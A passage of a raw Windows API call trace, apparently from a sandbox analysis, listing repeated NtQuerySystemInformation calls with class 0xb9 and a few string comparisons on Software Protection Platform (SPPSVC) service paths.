[0271.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0271.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0271.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x28, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x28, ResultLength=0x0) [0271.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x20, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x20, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x50, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0271.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0271.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0271.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0271.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0271.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0271.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x20, ResultLength=0x0) [0271.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0271.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0271.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0271.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0271.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x20, ResultLength=0x0) [0271.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0272.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.015] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc08, Length=0x50, ResultLength=0x0) [0272.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x28, ResultLength=0x0) [0272.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0272.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0272.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0272.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x28, ResultLength=0x0) [0272.030] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd60, Length=0x28, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0272.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0272.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x28, ResultLength=0x0) [0272.043] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.052] NtQuerySystemInformation (SystemInformationClass=0xb9, 